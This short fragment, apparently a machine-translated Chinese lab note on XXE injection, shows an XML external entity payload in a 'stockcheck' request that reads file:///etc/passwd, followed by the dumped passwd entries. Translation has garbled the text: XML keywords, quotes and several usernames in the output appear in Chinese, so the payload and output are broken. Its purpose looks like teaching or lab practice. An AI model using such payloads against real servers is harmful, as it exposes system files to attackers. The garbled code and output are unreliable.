XXE注入2-02
<?xml版本=“ 1”?>
<!Doctype Stockcheck [<!实体
xxe系统“ file:/// etc/passwd”>]>
&xxe;
敏感数据
root:x:0:0:root:/root:/bin/bash
守护程序:X:1:1:守护程序:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
系统:x:3:3:sys:/dev:/bin/sh
同步:X:4:65534:同步:/bin:/bin/sync
游戏:X:5:60:游戏:/usr/games:/bin/sh
男子:X:6:12:男人:/var/cache/anm:/bin/sh
LP:X:7:7:LP:/var/spool/lpd:/bin/sh
邮件:X:8:8:邮件:/var/mail:/bin/sh
新闻:X:9:9:新闻:/var/spool/news:/bin/sh
UUCP:X:10:10:UUCP:/var/spool/uucp:/bin/sh
代理:X:13:13:代理:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
备份:X:34:34:backup:/var/backups:/bin/sh